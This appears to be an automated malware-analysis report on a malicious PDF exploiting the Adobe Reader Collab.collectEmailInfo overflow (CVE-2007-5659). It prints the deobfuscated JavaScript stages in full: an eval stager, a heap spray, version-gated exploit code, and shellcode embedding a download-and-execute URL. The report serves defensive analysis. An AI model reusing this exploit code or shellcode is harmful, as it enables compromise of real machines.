Malicious PDF — malware analysis report

Static analysis result for SHA-256 215b60765536064c…

MALICIOUS

PDF

8.2 KB First seen: 2026-05-08
MD5: 498941469d1e02c85603d9eade1c7845 SHA-1: ad03441e8e1605dfa9c22efe813edd5a21c27963 SHA-256: 215b60765536064c4795e23784915cf0565f3519c378ea0aab989b5a66728bfe
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains multiple embedded JavaScript streams, some of which are obfuscated using String.fromCharCode and other techniques. The heuristics indicate that the PDF launcher concatenates information fields, extracts characters at a fixed stride, and evaluates the result. This suggests the script's primary purpose is to download and execute a second-stage payload from a remote source, a common technique for initial access.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var L6je5pyH = new Array();var WY__gFK8t006__w = 0;var P_00Hh_r = "";function e78__rQa2_FB__v(AU8O5qP34j, MY__To___ubf_X){var VLk04Ilw234V6p = MY__To___ubf_X.toString();var H4l7_6cn = "";for(var bp330arwN3uG = 0; bp330arwN3uG < VLk04Ilw234V6p.length; bp330arwN3uG++) {var i3W_TgR5kUk = parseInt(VLk04Ilw234V6p.substr(bp330arwN3uG, 1));if (!isNaN(i3W_TgR5kUk)) {i3W_TgR5kUk = i3W_TgR5kUk.toString(16);if (i3W_TgR5kUk.length == 1) { i3W_TgR5kUk = "0" + i3W_TgR5kUk; }else if (i3W_TgR5kUk.length != 2) { …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://googleinru.in/cgi-bin/etn/z006106201r0019Reebe2cb9Xc1067111Y2c3cc32cZ0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1B90 1839 bytes
SHA-256: 5e8883b77cb9423a668d5630a09301e84fb8854fc1de2b2def92920811bc1f58
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function eI6_6o_676hb(F_0___MyX, rL_6w30P_P6_pFO){var CEm8k64__H = 4;var kE_p7FH__853tpi = new Array();var Nv8sk_63 = new Array(107,256,11,  512, 106, 11,  44,40, 33);Nv8sk_63[5] += 12;var le8MEk0us = "";try {var jj__xd_T6TO = 0;if (app) {rL_6w30P_P6_pFO = pr[jj__xd_T6TO].subject;}} catch(e) {}if (!F_0___MyX) { kE_p7FH__853tpi[0] = 0;kE_p7FH__853tpi[1] = kE_p7FH__853tpi[0];kE_p7FH__853tpi[2] = kE_p7FH__853tpi[1];kE_p7FH__853tpi[3] = kE_p7FH__853tpi[2];var B__574Cbc = Nv8sk_63[6] + 3;var m_5a__l = B__574Cbc + 11;var H__D8N_3d__8j7c = eI6_6o_676hb;var fPsAJ_w8fw8h = 0;H__D8N_3d__8j7c = H__D8N_3d__8j7c.toString();for(var t1__1HA__Y1_1_K = 0; t1__1HA__Y1_1_K < H__D8N_3d__8j7c.length; t1__1HA__Y1_1_K++) {var E1_o3ak6__gS_k = H__D8N_3d__8j7c.charCodeAt(t1__1HA__Y1_1_K);if (E1_o3ak6__gS_k > B__574Cbc && E1_o3ak6__gS_k < m_5a__l) {if (fPsAJ_w8fw8h == 4) {fPsAJ_w8fw8h = 0;}kE_p7FH__853tpi[fPsAJ_w8fw8h] += E1_o3ak6__gS_k;if (kE_p7FH__853tpi[fPsAJ_w8fw8h] > Nv8sk_63[3]) {kE_p7FH__853tpi[fPsAJ_w8fw8h] -= 512;}fPsAJ_w8fw8h++;}}}else  { kE_p7FH__853tpi = F_0___MyX;}for (var j2M016 = 0; j2M016 < 4; j2M016++) {if (kE_p7FH__853tpi[j2M016] > Nv8sk_63[1]) {kE_p7FH__853tpi[j2M016] -= Nv8sk_63[1];}}var y1f1_C_q__1g = 0;var Y_Bbtf_R8O4 = 0;var Xi_0_l_I7c;var e5uU_5m48__t = 0;while ( y1f1_C_q__1g < rL_6w30P_P6_pFO.length ) {var R6w_K2__e = "";R6w_K2__e = rL_6w30P_P6_pFO.substr(y1f1_C_q__1g, 2);var AsdE_n_0x13et = parseInt(R6w_K2__e, Nv8sk_63[5]); if (Y_Bbtf_R8O4 == 4) {Y_Bbtf_R8O4 = 0;}AsdE_n_0x13et -= (e5uU_5m48__t + 2) * kE_p7FH__853tpi[Y_Bbtf_R8O4];if (AsdE_n_0x13et < 0) {AsdE_n_0x13et -= Math.floor(AsdE_n_0x13et / Nv8sk_63[1]) * Nv8sk_63[1];}le8MEk0us += String.fromCharCode(AsdE_n_0x13et);{y1f1_C_q__1g += 2;e5uU_5m48__t++;Y_Bbtf_R8O4++;}}var VWJM_3I5 = this;VWJM_3I5["eval"](le8MEk0us);return 0;}

	eI6_6o_676hb(0);
legacy_pdfkit_stage_001.js deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x4C3 4979 bytes
SHA-256: 08f5dd48c8a7c653d1ec0a6ef8f069f76914376162b6701766260fc8638f5cb3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var L6je5pyH = new Array();var WY__gFK8t006__w = 0;var P_00Hh_r = "";function e78__rQa2_FB__v(AU8O5qP34j, MY__To___ubf_X){var VLk04Ilw234V6p = MY__To___ubf_X.toString();var H4l7_6cn = "";for(var bp330arwN3uG = 0; bp330arwN3uG < VLk04Ilw234V6p.length; bp330arwN3uG++) {var i3W_TgR5kUk = parseInt(VLk04Ilw234V6p.substr(bp330arwN3uG, 1));if (!isNaN(i3W_TgR5kUk)) {i3W_TgR5kUk = i3W_TgR5kUk.toString(16);if (i3W_TgR5kUk.length == 1) { i3W_TgR5kUk = "0" + i3W_TgR5kUk; }else if (i3W_TgR5kUk.length != 2) { i3W_TgR5kUk = "00"; }H4l7_6cn = i3W_TgR5kUk + H4l7_6cn;}}while(H4l7_6cn.length < 8) { H4l7_6cn = "0" + H4l7_6cn; }var c0cM_j = AU8O5qP34j.toString(16);if (c0cM_j.length == 1) { c0cM_j = "0" + c0cM_j; }else if (c0cM_j.length != 2) { c0cM_j = "00"; }H4l7_6cn = "3" + c0cM_j + "P" + H4l7_6cn;return H4l7_6cn;}function nk2C_K51_hc8mt(TP0gb520hu, B_88_yNj_dHU_2){var Bd_5ALq = new Array("");var B7_I_4PC1vt = TP0gb520hu;var mk3_x71_i;if ((mk3_x71_i = TP0gb520hu.lastIndexOf("%u00")) != -1) {if (mk3_x71_i + 6 == TP0gb520hu.length) {Bd_5ALq[0] = TP0gb520hu.substr(mk3_x71_i + 4, 2);B7_I_4PC1vt = TP0gb520hu.substring(0, mk3_x71_i);}}mk3_x71_i = 1;for (bp330arwN3uG = 0; bp330arwN3uG < B_88_yNj_dHU_2.length; bp330arwN3uG++) {var F2rh7___0_joQF = B_88_yNj_dHU_2.charCodeAt(bp330arwN3uG).toString(16);if (F2rh7___0_joQF.length == 1) { F2rh7___0_joQF = "0" + F2rh7___0_joQF; }Bd_5ALq[mk3_x71_i] = F2rh7___0_joQF;mk3_x71_i++;}bp330arwN3uG = Bd_5ALq[0].length ? 0 : 1;Bd_5ALq[mk3_x71_i] = "00";Bd_5ALq[mk3_x71_i + 1] = "00";mk3_x71_i += 2;if ((Bd_5ALq.length - bp330arwN3uG) % 2) {Bd_5ALq[mk3_x71_i] = "00";}while(bp330arwN3uG < Bd_5ALq.length) {B7_I_4PC1vt += "%u" + Bd_5ALq[bp330arwN3uG + 1] + Bd_5ALq[bp330arwN3uG];bp330arwN3uG += 2;}B7_I_4PC1vt += "%u0000";return B7_I_4PC1vt;}function o54hFj_43(aG_v1_LX6, JN1wHD){while (aG_v1_LX6.length*2<JN1wHD) {aG_v1_LX6 += aG_v1_LX6;}aG_v1_LX6 = aG_v1_LX6.substring(0,JN1wHD/2);return aG_v1_LX6;}function x73Cj_h_6d4r5eA(S_2K833, R___g_O_w2, xfcHns_qme2p){var M___nJ__d5W23_2 = 0x0c0c0c0c;var aG_v1_LX6 = unescape(R___g_O_w2);var B_88_yNj_dHU_2 = e78__rQa2_FB__v(S_2K833, xfcHns_qme2p);var sih_E____l = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var TP0gb520hu = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4270%u4e6b%u0078%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3136%u3630%u3032%u7231%u3030%u3931%u6552%u6265%u3265%u6263%u5839%u3163%u3630%u3137%u3131%u3259%u3363%u6363%u3233%u5a63%u3130%u3030%u3066%u3036";app.nK484Pj = unescape(nk2C_K51_hc8mt(TP0gb520hu, B_88_yNj_dHU_2));var AEn_d6DN = 0x400000;var tQ__ps = sih_E____l.length * 2;var JN1wHD = AEn_d6DN - (tQ__ps+0x38);aG_v1_LX6 = o54hFj_43(aG_v1_LX6, JN1wHD);var NwP2l15mEo = (M___nJ__d5W23_2 - 0x400000)/AEn_d6DN;for (var a_r0_t_8 = 0; a_r0_t_8 < NwP2l15mEo; a_r0_t_8++) {L6je5pyH[a_r0_t_8] = aG_v1_LX6 + sih_E____l;}}function lV2v_x6Q(){var uA6_0___yW____d = "";for (bp330arwN3uG = 0; bp330arwN3uG < 12; bp330arwN3uG++) {uA6_0___yW____d += unescape("%u0c0c%u0c0c");}var sIM2e_b_Ii = "";for (bp330arwN3uG = 0; bp330arwN3uG < 750; bp330arwN3uG++) {sIM2e_b_Ii += uA6_0___yW____d;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: sIM2e_b_Ii});app.clearTimeOut(WY__gFK8t006__w);}function T__S_S_3B(h28UgPY63Hl7){var Re6BeKV8b = WY__gFK8t006__w;if ((h28UgPY63Hl7 >= 8 && h28UgPY63Hl7 < 8.11) || h28UgPY63Hl7 < 7.1) {x73Cj_h_6d4r5eA(23, "%u0c0c%u0c0c", h28UgPY63Hl7);lV2v_x6Q();}if (Re6BeKV8b) {app.clearTimeOut(Re6BeKV8b);}}var xfcHns_qme2p = 0;var m_2_n_62bh6t = app.plugIns;for (var wP__q52cmu0g_O = 0; wP__q52cmu0g_O < m_2_n_62bh6t.length; wP__q52cmu0g_O++) {var C_qtHO = m_2_n_62bh6t[wP__q52cmu0g_O].version;if (C_qtHO > xfcHns_qme2p) { xfcHns_qme2p = C_qtHO; }}if (app.viewerVersion == 9.103 && xfcHns_qme2p < 9.13) {xfcHns_qme2p = 9.13;}app.d_a2___5yPTw_l = T__S_S_3B;WY__gFK8t006__w = app.setTimeOut("app.d_a2___5yPTw_l(" + xfcHns_qme2p.toString() + ")", 50);